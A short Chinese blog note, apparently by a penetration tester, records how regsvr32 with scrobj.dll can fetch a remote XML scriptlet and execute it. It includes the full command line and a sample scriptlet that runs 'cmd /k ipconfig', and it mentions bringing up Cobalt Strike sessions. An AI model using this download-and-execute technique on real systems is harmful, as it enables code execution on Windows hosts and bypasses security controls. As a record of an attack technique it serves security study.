过去一直以为regsvr32是加载dll程序的,今天偶然看到一片文章写可以进行加载远程文件到本地进行命令执行,实验过后果真可以实行,所以在此做一个记录。这个行为其实有点鸡肋,因为当你能使用regsvr32命令的时候你一般已经拥有了这台计算机的shell,在没有杀毒软件的前提下直接执行powershell上线cs的命令即可,如果有杀毒软件那你做了免杀直接上传木马执行即可,我想了很久都没想到合适的利用方法,这里也是抛砖引玉,欢迎交流。
命令:
regsvr32 /u /n /s /i:http://127.0.0.1:80/a.png scrobj.dll上面这条命令,只能更改url部分,后面的dll文件名不能更改。且这个文件不一定得是jpg,可以是任意后缀名,不过文件内容格式是有要求的,得是xml格式的,举例如下:
<?XML version="1.0"?> <scriptlet> <registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("cmd /k ipconfig"); ]]> </script> </registration> </scriptlet>上面的脚本被加载到主机后会调用cmd执行ipconfig命令。
